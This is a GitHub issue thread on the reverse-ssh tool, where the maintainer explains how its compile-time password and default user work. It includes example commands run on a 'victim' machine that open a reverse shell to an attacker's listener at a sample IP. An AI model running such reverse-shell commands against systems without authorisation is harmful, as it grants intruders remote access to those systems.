Fahrj/reverse-ssh

Victim machine keeps asking for password

Closed this issue · 1 comments

Update: So it turns out the password is printed when I invoke the command .\reverse-ssh.exe -h (a random string).
This can be changed to a custom password in the Makefile before compiling.

Fahrj commented

Hi @nobeltnium,

sorry for the late reply, I was abroad the last few weeks.

I get the impression that you already found a solution to your initial question.

To add a little explanation from my current understanding of your problem: when you try to connect from the victim machine to the attacker machine to start the listener there (e.g. with .\reverse-ssh.exe -v 192.168.0.1), ReverseSSH first tries to log in with the same password that it would accept for incoming connections and if that doesn't work it asks for user input.
This password can be set at compile time and you can see it in the help/usage page (with -h flag).

The intention behind this behavior is that if you are catching the connection attempt with another instance of ReverseSSH, the passwords match and the ListenRequest is granted without further interaction.

Additionally, one should bear in mind that by default ReverseSSH tries to authenticate as user reverse if none is supplied. To change this, adapt the command on the victim like this: .\reverse-ssh.exe -v myuser@192.168.0.1 .

I would close this issue in a few days unless you have further questions.